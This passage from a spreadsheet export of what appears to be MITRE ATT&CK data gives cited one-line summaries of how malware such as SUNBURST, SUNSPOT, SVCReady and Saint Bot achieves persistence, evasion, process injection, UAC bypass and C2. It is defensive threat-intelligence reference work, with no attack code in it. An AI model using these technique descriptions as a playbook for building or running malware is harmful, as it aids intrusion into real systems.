    <t>[SUGARUSH](https://attack.mitre.org/software/S1049) has used port 4585 for a TCP connection to its C2.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--2311b504-e0c3-4594-8174-f9ce86941bc3</t>
  </si>
  <si>
    <t>[SUGARUSH](https://attack.mitre.org/software/S1049) has used `cmd` for execution on an infected host.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--a62fda63-0af7-442c-85a6-c5161dec94a6</t>
  </si>
  <si>
    <t>[SUGARUSH](https://attack.mitre.org/software/S1049) has created a service named `Service1` for persistence.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--8b580ccf-247a-4ebb-97f3-8d143ed1150c</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) also removed the firewall rules it created during execution.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>relationship--bf19c419-8736-4a1f-83cf-23ba5438ad4c</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) removed IFEO registry values to clean up traces of persistence.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>relationship--39080ec2-9914-4f83-a83e-18573da1b776</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) was digitally signed by SolarWinds from March - May 2020.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>relationship--9234553d-b096-418f-b3d0-de75c15d8180</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) used DNS for C2 traffic designed to mimic normal SolarWinds API communications.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>relationship--b6a60179-abb0-41ec-96cc-112abe232509</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected information from a compromised host.(Citation: Microsoft Analyzing Solorigate Dec 2020)(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>relationship--5260f605-09d0-4d96-9239-9b93a76d0cbe</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) attempted to disable software security services following checks against a FNV-1a + XOR hashed hardcoded blocklist.(Citation: FireEye SUNBURST Additional Details Dec 2020)</t>
  </si>
  <si>
    <t>relationship--076141ed-10e8-4161-9cca-de1819f9cbdc</t>
  </si>
  <si>
    <t>10 January 2021</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) dynamically resolved C2 infrastructure for randomly-generated subdomains within a parent domain.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>relationship--f974cb59-0c30-43a3-bb3e-58ebc1007d6d</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) had a command to delete files.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>relationship--beeabdd2-deb3-43fc-b7d4-884f078271a1</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) had commands to enumerate files and directories.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>relationship--6189bf91-d755-47e6-9f3c-dd621e3f64fd</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</si>
  <si>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</si>
  <si>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relationship--78fce2a1-4d92-4e67-8e9b-c684f33b4536</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) removed HTTP proxy registry values to clean up traces of execution.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>relationship--fed38133-26a9-44e3-b57d-9d415aaeaf84</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</si>
  <si>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</si>
  <si>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relationship--e88a2959-311f-40c9-adc9-895f38bb1dd7</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) delivered different payloads, including [TEARDROP](https://attack.mitre.org/software/S0560) in at least one instance.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>relationship--e83fb711-3ce0-4c6a-a8b2-0efb96551b99</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) added junk bytes to its C2 over HTTP.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>relationship--ade42bce-dfa6-4a34-8a42-dad089debbd0</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNBURST](https://attack.mitre.org/software/S0559) created VBScripts that were named after existing services or folders to blend into legitimate activities.(Citation: Microsoft Deep Dive Solorigate January 2021) </t>
  </si>
  <si>
    <t>relationship--81f979db-6420-4686-9239-085ff2a8cc53</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</si>
  <si>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</si>
  <si>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relationship--15cd99f1-29b4-4603-ae74-fdc204afead4</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</si>
  <si>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</si>
  <si>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relationship--713fdffc-8955-43d6-b1bd-4515d3ca06a6</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected a list of process names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>relationship--988f5b4b-bfc7-4714-b6f0-f753c0472cab</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) masqueraded its network traffic as the Orion Improvement Program (OIP) protocol.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>relationship--ac71c15a-3c61-4e73-9663-fb35dc0a1a66</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected the registry value &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid&lt;/code&gt; from compromised hosts.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>relationship--cedfb953-2088-4e8d-a21b-57fdfce65337</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNBURST](https://attack.mitre.org/software/S0559) used Rundll32 to execute payloads.(Citation: Microsoft Deep Dive Solorigate January 2021) </t>
  </si>
  <si>
    <t>relationship--797a925e-7fe8-4d88-a372-88160f24b111</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) checked for a variety of antivirus/endpoint detection agents prior to execution.(Citation: Microsoft Analyzing Solorigate Dec 2020)(Citation: FireEye SUNBURST Additional Details Dec 2020)</t>
  </si>
  <si>
    <t>relationship--cf32330f-0d67-4e10-adae-2fe3157f6888</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) used Base64 encoding in its C2 traffic.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>relationship--2db32876-d6f5-4862-b760-f0a9dfb28c3c</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</si>
  <si>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</si>
  <si>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relationship--f01cbea5-8528-45e8-afdf-d1f382980d8a</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) encrypted C2 traffic using a single-byte-XOR cipher.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>relationship--28b3fb26-c7f8-481d-8424-895953bfb492</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) checked the domain name of the compromised host to verify it was running in a real environment.(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>relationship--c911e8d7-be27-48cf-8f5a-0be56cbe6592</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected hostname, OS version, and device uptime.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>relationship--142afe71-581e-415e-9867-97ac0aaded65</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected all network interface MAC addresses that are up and not loopback devices, as well as IP address, DHCP configuration, and domain information.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>relationship--6de977db-83b0-474e-9e18-4b8f67eb4ddb</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected the username from a compromised host.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>relationship--d9089fda-0f17-43d2-bd5b-b9cd441bb4e2</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected a list of service names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>relationship--7e2ceab5-e5ae-4c79-aceb-424d42703e5f</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) remained dormant after initial access for a period of up to two weeks.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>relationship--0648b4df-ad84-4c94-8a0c-16e392f80f82</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) used VBScripts to initiate the execution of payloads.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>relationship--b59f580e-526d-4f80-bf8a-5fed0a5f2f51</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) communicated via HTTP GET or HTTP POST requests to third party servers for C2.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>relationship--ecc31d1c-b5ac-4458-b379-a5c003637ee2</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) used the WMI query &lt;code&gt;Select * From Win32_SystemDriver&lt;/code&gt; to retrieve a driver listing.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>relationship--088f896a-59a4-4bce-aacf-3a1f0d6c4237</t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) modified its security token to grants itself debugging privileges by adding &lt;code&gt;SeDebugPrivilege&lt;/code&gt;.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t>relationship--339e74c4-5e3a-4272-966f-f5542d255d0a</t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) malware was designed and used to insert [SUNBURST](https://attack.mitre.org/software/S0559) into software builds of the SolarWinds Orion IT management product.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t>relationship--84c6ce73-83b4-43f1-aeae-4b7e2f8b4d34</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNSPOT](https://attack.mitre.org/software/S0562) decrypts [SUNBURST](https://attack.mitre.org/software/S0559), which was stored in AES128-CBC encrypted blobs.(Citation: CrowdStrike SUNSPOT Implant January 2021)  </t>
  </si>
  <si>
    <t>relationship--b8333924-1556-4c3f-b60f-105984e1f715</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</si>
  <si>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</si>
  <si>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relationship--70d81631-4f33-4fd0-98ac-15b57b8c1ed1</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</si>
  <si>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</si>
  <si>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relationship--39f5d465-832e-4de8-9738-0879803e2b1c</t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) enumerated the Orion software Visual Studio solution directory path.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t>relationship--6d8b4863-f8db-4776-a70f-ea16255d45bd</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</si>
  <si>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</si>
  <si>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relationship--be94a9ae-e54a-427e-8caa-36cea954abcb</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</si>
  <si>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</si>
  <si>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relationship--9b59a1db-0b3d-4ce7-9cea-d91a71dd0a57</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</si>
  <si>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</si>
  <si>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relationship--41118997-c45e-4123-be61-1b0c5d456256</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</si>
  <si>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</si>
  <si>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relationship--09f6307c-819e-4e35-bfc7-5314b0c3ce85</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</si>
  <si>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</si>
  <si>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relationship--41d6749b-9bd1-47f6-80c4-52652b965e78</t>
  </si>
  <si>
    <t>S0578</t>
  </si>
  <si>
    <t>SUPERNOVA</t>
  </si>
  <si>
    <t>malware--b2b0b946-be0a-4a7f-9c32-a2e5211d1cd9</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) was installed via exploitation of a SolarWinds Orion API authentication bypass vulnerability (CVE-2020-10148).(Citation: Carnegie Mellon University Supernova Dec 2020)(Citation: Splunk Supernova Jan 2021)</t>
  </si>
  <si>
    <t>relationship--6b8761f0-fd7d-45da-971a-b3883e77fcc5</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) has masqueraded as a legitimate SolarWinds DLL.(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: Unit42 SUPERNOVA Dec 2020)</t>
  </si>
  <si>
    <t>relationship--8b345565-9a36-4b4a-ace5-b4c50ea894ca</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) contained Base64-encoded strings.(Citation: CISA Supernova Jan 2021)</t>
  </si>
  <si>
    <t>relationship--c73f0de0-1fbb-44e6-ac51-95bf21ea4018</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) had to receive an HTTP GET request containing a specific set of parameters in order to execute.(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: Unit42 SUPERNOVA Dec 2020)</t>
  </si>
  <si>
    <t>relationship--072ce102-e907-455c-a707-cded0bb29216</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) is a Web shell.(Citation: Unit42 SUPERNOVA Dec 2020)(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: CISA Supernova Jan 2021)</t>
  </si>
  <si>
    <t>relationship--b847cd82-14c8-4270-b03d-2acf3abda4b6</t>
  </si>
  <si>
    <t>S1064</t>
  </si>
  <si>
    <t>SVCReady</t>
  </si>
  <si>
    <t>malware--7230ded7-3b1a-4d6e-9735-d0ffd47af9f6</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) has created the `HKEY_CURRENT_USER\Software\Classes\CLSID\{E6D34FFC-AD32-4d6a-934C-D387FA873A19}` Registry key for persistence.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--71e7aad7-c81e-4035-bec0-323b7dc51d57</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) can collect data from an infected host.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--134a44d5-19f9-4052-9dc2-b1f5af870e28</t>
  </si>
  <si>
    <t xml:space="preserve">[SVCReady](https://attack.mitre.org/software/S1064) can send collected data in JSON format to its C2 server.(Citation: HP SVCReady Jun 2022) </t>
  </si>
  <si>
    <t>relationship--4b2de33f-c8cf-48dc-aa6d-524460bb3e24</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) has the ability to download additional tools such as the RedLine Stealer to an infected host.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--3f491de8-7a45-413d-8e80-5c74b38e0fc1</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) has relied on users clicking a malicious attachment delivered through spearphishing.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--11670d59-3a21-4dec-bec4-9e6e8de8d89a</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) has named a task `RecoveryExTask` as part of its persistence activity.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--15563e89-85cc-4092-a359-4351999bb9f3</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) can use Windows API calls to gather information from an infected host.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--990d1dde-8b25-4b83-93a0-50533b557b82</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) can encrypt victim data with an RC4 cipher.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--1098fd1c-b615-4730-bc99-3cda386f2e4c</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) can check for the number of devices plugged into an infected host.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--69e4b520-6a9f-4dc0-b11e-805886ce8257</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) can collect a list of running processes from an infected host.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--c60fb662-befd-459b-906b-b816b76a727a</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) can search for the `HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System` Registry key to gather system information.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--10514be7-2dcb-4e70-a579-e1e1e6c2d900</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) has used `rundll32.exe` for execution.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--19a6f8fb-22c6-476c-9343-93956d9c1b77</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) can create a scheduled task named `RecoveryExTask` to gain persistence.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--2d1b98bb-cbc8-492a-9861-f350153291cd</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) can take a screenshot from an infected host.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--77fd0c13-d101-438a-a3fb-dfdcaa6e21ce</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) can collect a list of installed software from an infected host.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--d066c8bf-591c-4923-8794-5336cd568ab2</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) has been distributed via spearphishing campaigns containing malicious Mircrosoft Word documents.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--1401717f-8315-430c-aae6-045602619d52</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) has the ability to determine if its runtime environment is virtualized.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--c29ef74c-0ddd-457a-b1e8-70793bbdda85</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) has the ability to collect information such as computer name, computer manufacturer, BIOS, operating system, and firmware, including through the use of `systeminfo.exe`.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--bfaa2e3f-fab0-4136-a951-ed1bad30a771</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) can collect the username from an infected host.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--6cd6dc77-210e-41d7-b534-88d5c21e6a9b</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) can collect time zone information.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--9414386b-adbf-4117-ba5b-81a242714d83</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) can enter a sleep stage for 30 minutes to evade detection.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--db2307cc-3e11-4b2f-83c8-be57371b9c51</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) has used VBA macros to execute shellcode.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--188366e1-a2a9-4025-ac5a-ce56d940094a</t>
  </si>
  <si>
    <t>[SVCReady](https://attack.mitre.org/software/S1064) can communicate with its C2 servers via HTTP.(Citation: HP SVCReady Jun 2022)</t>
  </si>
  <si>
    <t>relationship--5af6fee5-4361-4a84-b214-f30aa6a9506e</t>
  </si>
  <si>
    <t xml:space="preserve">[SVCReady](https://attack.mitre.org/software/S1064) can use `WMI` queries to detect the presence of a virtual machine environment.(Citation: HP SVCReady Jun 2022) </t>
  </si>
  <si>
    <t>relationship--a295ad0d-28fe-4707-a699-7e49b4e8d9f3</t>
  </si>
  <si>
    <t>S0519</t>
  </si>
  <si>
    <t>SYNful Knock</t>
  </si>
  <si>
    <t>malware--84c1ecc6-e5a2-4e8a-bf4b-651a618e0053</t>
  </si>
  <si>
    <t>[SYNful Knock](https://attack.mitre.org/software/S0519) has the capability to add its own custom backdoor password when it modifies the operating system of the affected network device.(Citation: Mandiant - Synful Knock)</t>
  </si>
  <si>
    <t>relationship--d3eec81c-8d8d-486d-919b-dc63a12555df</t>
  </si>
  <si>
    <t>14 December 2021</t>
  </si>
  <si>
    <t>[SYNful Knock](https://attack.mitre.org/software/S0519) is malware that is inserted into a network device by patching the operating system image.(Citation: Mandiant - Synful Knock)(Citation: Cisco Synful Knock Evolution)</t>
  </si>
  <si>
    <t>relationship--1fbc7b2a-1cdb-455b-bd5a-b0ff29efe800</t>
  </si>
  <si>
    <t>[SYNful Knock](https://attack.mitre.org/software/S0519) can be sent instructions via special packets to change its functionality. Code for new functionality can be included in these messages.(Citation: Mandiant - Synful Knock)</t>
  </si>
  <si>
    <t>relationship--5d9b14c3-70ea-46b3-9b0d-1595c215efec</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) has the ability to use FTP in C2 communications.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>relationship--bceb819a-0ab5-412b-9671-de67e980cb77</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) has been executed by luring victims to open malicious e-mail attachments.(Citation: Unit 42 CARROTBAT November 2018)</t>
  </si>
  <si>
    <t>relationship--94f1a9b7-e068-49b8-a2b7-9eb59055476c</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) has the ability to use [Tasklist](https://attack.mitre.org/software/S0057) to list running processes.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>relationship--b5744487-e865-4ff2-9d69-e98c1148aade</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) has the ability to use [Systeminfo](https://attack.mitre.org/software/S0096) to identify system information.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>relationship--01ebd689-8233-409a-a12d-eafb2546f665</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) has the ability to execute commands through [cmd](https://attack.mitre.org/software/S0106) on a compromised host.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>relationship--4469d943-1e9b-47a9-8e91-cc7883b918cb</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has written its payload into a newly-created `EhStorAuthn.exe` process using `ZwWriteVirtualMemory` and executed it using `NtQueueApcThread` and `ZwAlertResumeThread`.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>relationship--619d3ad7-82f3-40c0-bce6-92fe36181425</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has attempted to bypass UAC using `fodhelper.exe` to escalate privileges.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--22e9d049-aa86-46d3-a2a4-f5ae6e0cc2d8</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) can collect files and information from a compromised host.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>relationship--ff709d3a-de60-4e1d-abd1-ad30e6837a62</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has used `is_debugger_present` as part of its environmental checks.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>relationship--885a3674-5a25-42e4-aa7f-148a41493861</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) can deobfuscate strings and files for execution.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>relationship--b105573a-4d07-4253-8a5b-82f68357e098</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has injected its DLL component into `EhStorAurhn.exe`.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>relationship--092ea2a0-c8f5-409f-b391-119f3446e63c</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</si>
  <si>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</si>
  <si>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relationship--f774b7e4-15c6-42d8-917a-efd8617c0c0f</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) can search a compromised host for specific files.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--dbc56199-173e-4325-af52-ee6fd26dbdb6</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) can download additional files onto a compromised host.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--3a9e3914-2503-41e7-a9cb-57dd30f97a8a</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) had used `InstallUtil.exe` to download and deploy executables.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>relationship--e3ac1997-f11f-4f3d-8339-8e077ab00149</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has relied upon users to execute a malicious attachment delivered via spearphishing.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--60dd06c7-788f-45e7-8845-3bb1cb4f2c17</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has relied on users to click on a malicious link delivered via a spearphishing.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--e877f75e-4b57-4328-a17c-a7c46929ae84</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has renamed malicious binaries as `wallpaper.mp4` and `slideshow.mp4` to avoid detection.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--37e3dbd7-9ecc-4e3a-9fa3-488e3a910f55</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has been disguised as a legitimate executable, including as Windows SDK.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>relationship--ccd6c063-9699-4592-b903-3becc2008b91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</si>
  <si>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</si>
  <si>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relationship--6052eaae-d1a4-47aa-91ff-e1db16521dd3</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has been obfuscated to help avoid detection.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--2e8b176a-b8a8-4bd0-8542-97ff009c673c</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has used PowerShell for execution.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--80bd9e02-dee9-48e9-9a75-a64ac58eefad</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has enumerated running processes on a compromised host to determine if it is running under the process name `dfrgui.exe`.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--bb54d492-228c-4bfe-8e50-9a919067e976</t>
  </si>
  <si>
    <t>The [Saint Bot](https://attack.mitre.org/software/S1018) loader has used API calls to spawn `MSBuild.exe` in a suspended state before injecting the decrypted [Saint Bot](https://attack.mitre.org/software/S1018) binary into it.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--b58eb56c-9992-4fcd-ae4f-b7a1301667f0</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has used `check_registry_keys` as part of its environmental checks.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>relationship--5da42f91-d58e-48bd-b8b2-3d35db7edcf2</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</si>
  <si>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</si>
  <si>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relationship--a7ad3949-0d4d-49a8-a2cd-3a0d5857ba92</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has used `regsvr32` to execute scripts.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--036fcb1f-4cc1-4b48-bb9b-9312c9c8d9d9</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has created a scheduled task named "Maintenance" to establish persistence.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>relationship--5dadf8c9-3e69-4e5f-9dc2-829e6601aa11</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has been packed using a dark market crypter.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>relationship--6ebb24bf-8e82-4824-8959-b6f4348d2efd</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has been distributed as malicious attachments within spearphishing emails.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--c7a94c1f-8b59-4bd7-9ab4-1f95b9927022</t>
  </si>
  <si>
